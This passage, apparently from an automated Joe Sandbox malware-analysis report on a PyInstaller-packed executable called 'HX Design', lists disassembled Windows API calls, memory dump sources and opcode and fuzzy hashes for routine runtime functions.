                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: GetLastError.KERNEL32 ref: 00007FF7320685D2
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: GetTokenInformation.KERNELBASE ref: 00007FF732068612
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF73206862E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: CloseHandle.KERNEL32 ref: 00007FF732068646
                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF732063C55), ref: 00007FF73206916C
                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF732063C55), ref: 00007FF732069175
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                      • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                      • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                      • Instruction ID: acf6b1592f859a49830db41f1cc66abec1b0fdd65fac89753ce5a9c2fc968da1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C216231B08742A1F610BB20E5152FAE261FF84780FD44036EA4D57B96DFBCD849E760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(00000000,?,00007FF73206352C,?,00000000,00007FF732063F23), ref: 00007FF732067F32
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                      • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                      • Instruction ID: cb5503d9ef1ce6fb035f8cc693bb8ebce0ff3813b2026f86c57c645c16a20f8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1312821719AC165FA21AB20E8107AAA354EF84BE0F800231EE6D47BD9EF7CD649D714
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73207CF4B), ref: 00007FF73207D07C
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73207CF4B), ref: 00007FF73207D107
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                      • Instruction ID: 9844f4bf710d9e253e86d0feab19913dfb1c066e20067fca83d4801b33b2f880
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D910832F08651B5F760FF69944027DABA0BB54B88F944139DE1E57A84CFBCD44AD720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                      • Instruction ID: 4bb68b1999a5f0fd7d390b880599b61f40378b254580015dbdf67592ec937396
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93516C72F04211A6FB14FF68D8596BCA7B1AF40358F900236DD2E52AE5DF7CA40AD710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                                                                      • Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                                      • Instruction ID: b1d3085229a13e1b89190dbefc57157f28a68d0ee3fa6b06382b4c94098d03a0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29519E22E086419AFB50FFB4D4503BDBBA1AB48B58F908435DE0D57A89DFB8D449D320
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                                                                                                      • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                      • Instruction ID: a88995a32b805eaf733e4967039d5cbe0c8f053d25ba20d1071f0a3bfc24d80d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4741C822E1878193F750BB6495103B9B760FB94764F508335EAAC07AD1DFBCA1E4D720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3251591375-0
                                                                                                                                                                                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                      • Instruction ID: 0fbfbcdd6c9f05539b51e2fa2716257d61b27fea095dab5dc16ee6e8bec5e937
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C316C20F0C14775FA54BB64942A3B9A291EF55384FC45434DA4E4B2E3DEECB80CE238
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                      • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                      • Instruction ID: c79b71c2989ce2cdab7a95e1d82a21e42d15d52374114a479f549902bfd0e9bf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0D09E10B0970A72EF143B745C950799255AF48B01FD41438C86B86393DDACA84DE360
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                      • Instruction ID: 4e52f43d3751e9ee8d3ead5ea3cc6b378f6371290f23be4914f33c39012a5b2e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82511921B0D241A6F764BA2D950077AE292BF84BB4F988734DD7D077D5CEBCE409E620
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                      • Instruction ID: 0951110e04afcd601b5bcd0ea8e43cb15c2962e5385ccc5e352e290fd50850b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16110421708A8191DA20AB29B854079E361FB52FF0F940331EE7D0B7E8CEBCD018D710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF732075839), ref: 00007FF732075957
                                                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF732075839), ref: 00007FF73207596D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1707611234-0
                                                                                                                                                                                                                                                      • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                      • Instruction ID: c266c2288e70c2df7cf00052a8f31d9ea4a8d2f3847caffcfaa776bb6d21a138
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB11A77160C742D1EB546B58A45107BF760FB84771F900236FAAD819E4EFACD458EB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                                      • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                      • Instruction ID: 529dcf89f30815f5baa4e9da6c9bc666eddc1c690ef2c4977b07a7f388ed66d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEE08610F1920272FF087BF558451399250AF84700FC40030C81D932A2EDAC685DE730
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF73207A9D5,?,?,00000000,00007FF73207AA8A), ref: 00007FF73207ABC6
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF73207A9D5,?,?,00000000,00007FF73207AA8A), ref: 00007FF73207ABD0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                      • Instruction ID: 2efcec7a8f241a409b2e8334b8400b74e6397cc9e3deb9c6ccefcc9e219773cc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D721D811F0868261FEA4B759A49437D92929FC47A0F884239DA2E577D3CEEDE44DF320
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                      • Instruction ID: e2d723c97b07eda993b38d71a23a8e668700ecbb1697e0c5dec6bab3d869dd4b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8541C532A1824597EA34BB1DA54027DF7A0EB55B90F900131EB8E437D1CFADE406EB71
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
